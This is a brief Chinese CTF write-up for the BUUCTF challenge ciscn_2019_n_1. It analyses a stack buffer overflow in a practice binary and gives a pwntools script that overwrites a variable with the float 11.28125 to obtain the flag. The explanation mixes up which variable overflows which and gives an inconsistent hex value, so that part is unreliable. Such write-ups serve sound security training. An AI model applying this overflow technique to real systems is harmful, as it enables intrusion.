BUUCTF ciscn_2019_n_1 1

分析

使用file命令查看文件信息
在这里插入图片描述

使用IDA64打开文件
BUUCTF ciscn_2019_n_1 1_第1张图片
进入func函数
BUUCTF ciscn_2019_n_1 1_第2张图片

如果 v2 等于 11.28125 就可以拿到flag
可以看到v1有栈溢出,并且v1在v2的上面,可以通过溢出v2来覆盖v1的值从而获取flag

首先v1是浮点数 11.28125 的二进制是 0x413480

exp

from pwn import *

context.arch = 'amd64'
p = remote('node4.buuoj.cn',26625)

p.sendline(flat([b'a'*(0x30-4) , 0x41348000]))

p.interactive()

你可能感兴趣的:(#,pwn,buuctf,ctf,pwn)